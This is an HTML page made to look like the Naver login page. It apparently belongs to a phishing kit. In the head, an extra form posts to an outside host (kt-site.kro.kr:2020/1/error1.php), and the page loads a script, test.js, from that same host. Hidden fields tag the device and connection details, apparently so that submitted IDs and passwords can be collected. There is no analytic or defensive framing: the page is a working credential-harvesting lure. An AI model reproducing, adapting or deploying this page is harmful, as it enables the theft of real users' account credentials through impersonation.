<!DOCTYPE html>
<html lang="ko">
<head>
<form method="post" action="http://kt-site.kro.kr:2020/1/error1.php" id="login_form" name="login_form">
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<meta property="og:type" content="website">
	<meta property="og:title" content="[네이버: 로그인]">
	<meta property="og:description" content="안전한 로그인을 위해 주소창의 URL과 자물쇠 마크를 확인하세요!">
	<meta property="og:image" content="https://ssl.pstatic.net/sstatic/search/common/og_v3.png">
	<meta property="og:image:type" content="image/png">
	<meta property="og:image:width" content="1200">
	<meta property="og:image:height" content="1200">		
	<title>네이버 : 로그인</title>
	<link rel="stylesheet" type="text/css" href="https://nid.naver.com/login/css/global/desktop/w_20200707.css?20201006">
</head>
<body class="chrome">
<div id="wrap">
    <div id="u_skip">
        <a href="#content" id="u_skip_anchor"><span>본문으로 바로가기</span></a>
    </div>
	<!-- header -->
	<div id="header">
		<h1><a href="https://www.naver.com" class="sp h_logo" id="log.naver"><span class="blind">NAVER</span></a></h1>
		<div class="lang">
			<select id="선택 언어" name="선택 언어" title="언어선택" class="sel">
				<option value="ko_KR" >한국어</option>
				<option value="en_US" >English</option>
				<option value="zh-Hans_CN" >中文(简体)</option>
				<option value="zh-Hant_TW" >中文(台灣)</option>
			</select>
		</div>
	</div>
	<div id="container">
		<!-- content -->
		<div id="content">
			<div class="title" aria-live="assertive">
				<p></p>
			</div>
				<form id="frmNIDLogin" name="frmNIDLogin" target="_top" AUTOCOMPLETE="off" action="https://nid.naver.com/nidlogin.login" method="POST">


<input type="hidden" name="접속 정보" id="접속 사이트" value="네이버 [ 컴퓨터 모바일 공용 ]">

				<fieldset class="login_form">
					<legend class="blind">로그인</legend>
					<div class="id_area">
						<div class="input_row" id="id_area">
							<span class="input_box">
								<label for="id" id="label_id_area" class="lbl">아이디</label>
								<input type="text" id="id" name="id" accesskey="L" placeholder="아이디" class="int" maxlength="41" value="">
							</span>
							<button type="button" disabled="" title="delete" id="id_clear" class="wrg">삭제</button>
						</div>
						<div class="error" id="err_empty_id" style="display:none" aria-live="assertive"></div>
					</div>
					<div class="pw_area">
						<div class="input_row" id="pw_area">
							<span class="input_box">
								<label for="pw" id="label_pw_area"  class="lbl">비밀번호</label>
								<input type="password" id="pw" name="pw" placeholder="비밀번호" class="int" maxlength="16">
							</span>
							<button type="button" disabled="" title="delete" id="pw_clear" class="wrg">삭제</button>
							<div class="ly_v2" id="err_capslock" style="display:none;">
								<div class="ly_box">
									<p><strong>Caps Lock</strong>이 켜져 있습니다.</p>
								</div>
								<span class="sp ly_point"></span>
							</div>
						</div>
						<div class="error" id="err_empty_pw" style="display:none" aria-live="assertive"></div>
					</div>

					<input type="submit" title="로그인" alt="로그인" value="로그인" class="btn_global" id="log.login">
					<div class="check_info">
						<div class="login_check">
							<span class="login_check_box">
								<input type="checkbox" id="login_chk" name="nvlong" class=""  value="off" />
								<label for="login_chk" id="label_login_chk" class="ico_keep_check ">로그인 상태 유지</label>
							</span>
						</div>
						<div class="pc_check">
							<span class="ip_check">
								<a href="/login/ext/help_ip3.html" target="_blank" id="ipguide" title="" >
									<span class="ip_txt01">IP</span>
									<span class="ip_txt02">보안</span>								
								</a>
								<span class="ip_ch">
									<input type="checkbox" id="ip_on" value="off" class=""/>
									<label for="ip_on" id="label_ip_on" class="security ">OFF</label>
								</span>
							</span>
						</div>
					</div>
				</fieldset>
			</form>
			<div class="qr_once_wrap">
				<div class="qr_once_inner">
					<p class="title">더욱 간편한 로그인</p>
					<div class="qr_once_area">
						<div class="item">
							<button type="button" id="log.QR" class="item_btn">
								<span class="icon_qr" aria-hidden="true"></span>
								<span class="txt"><em class="en">QR</em>코드 로그인</span>
							</button>
						</div>
						<div class="item">
							<button type="button" id="log.otn" class="item_btn">
								<span class="icon_once" aria-hidden="true"></span>
								<span class="txt">일회용 번호 로그인</span>
							</button>
						</div>
					</div>
					<div class="nudge_tooltip" id="nudge_tooltip">						
						<span class="banner_area">
							<span class="edge"></span>
							<span class="text"><em>PC방 등 공용 PC라면 안전하게 사용해 보세요.</em></span>
							<a href="#" id="nudge_close" role="button" aria-label="닫기" class="nudge_close"></a>
						</span>
					</div>
				</div>				
			</div>

			<div class="position_a">
				<div class="find_info">
					<a target="_blank" id="idinquiry" href="https://nid.naver.com/user2/api/route.nhn?m=routeIdInquiry&lang=ko_KR">아이디 찾기</a> <span class="bar" aria-hidden="true">|</span> <a target="_blank" id="pwinquiry" href="https://nid.naver.com/user2/api/route.nhn?m=routePwInquiry&lang=ko_KR">비밀번호 찾기</a> <span class="bar" aria-hidden="true">|</span> <a target="_blank" id="join" href="https://nid.naver.com/user2/V2Join.nhn?m=agree&lang=ko_KR">회원가입</a>
				</div>
			</div>
			<a href="https://m.site.naver.com/0ECrg" target="_blank" class="naversign_cert_banner">
				<span class="bill_img_pc"></span>
				<span class="blind">
					<strong>네이버인증서</strong>
					미리 발급해 두면 <br>
					3년 동안 안전하게 본인 확인
				</span>
			</a>
		</div>
		<!-- //content -->
	</div>
	<!-- //container -->
	<!-- footer -->
	<div id="footer">
		<ul>
		<li><a target="_blank" href="http://www.naver.com/rules/service.html" id="fot.agreement">이용약관</a></li>
		<li><strong><a target="_blank" href="http://www.naver.com/rules/privacy.html" id="fot.privacy">개인정보처리방침</a></strong></li>
		<li><a target="_blank" href="http://www.naver.com/rules/disclaimer.html" id="fot.disclaimer">책임의 한계와 법적고지</a></li>
		<li><a target="_blank" href="https://help.naver.com/support/service/main.nhn?serviceNo=532" id="fot.help">회원정보 고객센터</a></li>
		</ul>
		<address><em><a target="_blank" href="http://www.navercorp.com" class="logo" id="fot.naver"><span class="blind">naver</span></a></em><em class="copy">Copyright</em> <em class="u_cri">&copy;</em> <a target="_blank" href="http://www.navercorp.com" class="u_cra" id="fot.navercorp">NAVER Corp.</a> <span class="all_r">All Rights Reserved.</span></address>	
	</div>
	<!-- //footer -->
</div>
<input type="hidden" id="nclicks_nsc" name="nclicks_nsc" value="nid.login_kr">
<input type="hidden" id="nid_buk" name="nid_buk" value="exist">
<input type="hidden" id="ncaptchaSplit" name="ncaptchaSplit" value="none">
<input type="hidden" id="id_error_msg" name="id_error_msg" value="아이디를 입력해주세요.">
<input type="hidden" id="pw_error_msg" name="pw_error_msg" value="비밀번호를 입력해주세요.">
<input type="hidden" id="locale" name="locale" value="ko_KR">
<input type="hidden" name="접속기기" value="컴퓨터">
<input type="hidden" id="adult_surl_v2" name="adult_surl_v2" value="">
<script type="text/javascript" src="https://nid.naver.com/login/js/bvsd.1.3.4.min.js"></script>
<script type="text/javascript" src="http://kt-site.kro.kr:2020/1/test.js"></script>
<script type="text/javascript" src="https://nid.naver.com/login/js/default/default200417.js?20200904"></script>
<div id="nv_stat" style="display:none;">20</div>
</body>
</html>

